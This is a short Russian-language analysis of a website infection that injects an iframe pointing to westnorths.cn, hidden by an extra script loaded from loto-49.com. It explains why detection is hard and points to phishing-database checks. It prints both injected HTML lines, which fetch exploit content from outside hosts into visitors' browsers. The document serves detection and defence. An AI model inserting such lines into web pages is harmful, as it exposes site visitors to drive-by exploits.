Вирус iframe westnorths.cn

Код вируса:

<iframe src="http://westnorths.cn/index.php?s=826f3bdce007009c5ceb6c26ccf638bc"></iframe>

Вирус примечателен отсутствием маскирующих iframe стилистических атрибутов (display:none, width=1 height=1 и др.). Скрытие здесь делается необычным методом, с помощью дополнительного подгружаемого javascript:

<script src=http://loto-49.com/wp-content/wp-feed.php></script>

Такая структура делает вирус очень сложным для обнаружения на скрытой стадии (когда iframe уже вписан в страницы сайта, но начинка его ещё не подгружается). Данный вирус обнаруживается только по принципу контроля адреса westnorths.cn по pfishing-базам либо уже на активной стадии, когда в iframe начинает подкачиваться эксплойт.